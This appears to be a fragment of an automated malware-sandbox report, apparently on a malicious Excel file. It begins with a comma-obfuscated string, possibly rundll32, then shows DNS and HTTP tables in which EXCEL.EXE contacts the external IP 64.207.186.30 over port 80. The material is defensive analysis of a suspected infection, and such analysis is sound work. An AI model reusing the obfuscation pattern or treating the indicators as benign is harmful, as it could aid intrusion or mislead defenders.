,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32
Network Behavior |
---|
TCP Packets |
---|
UDP Packets |
---|
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 12, 2021 17:12:10.166270971 CEST | 192.168.2.3 | 8.8.8.8 | 0xda23 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 12, 2021 17:12:28.505542040 CEST | 192.168.2.3 | 8.8.8.8 | 0xd09 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 12, 2021 17:12:10.235234022 CEST | 8.8.8.8 | 192.168.2.3 | 0xda23 | No error (0) | authgfx.msa.akadns6.net | CNAME (Canonical name) | IN (0x0001) | ||
Apr 12, 2021 17:12:28.651699066 CEST | 8.8.8.8 | 192.168.2.3 | 0xd09 | No error (0) | 64.207.186.30 | A (IP address) | IN (0x0001) |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49714 | 64.207.186.30 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 12, 2021 17:12:28.785401106 CEST | 826 | OUT | |
Apr 12, 2021 17:12:29.014661074 CEST | 979 | IN |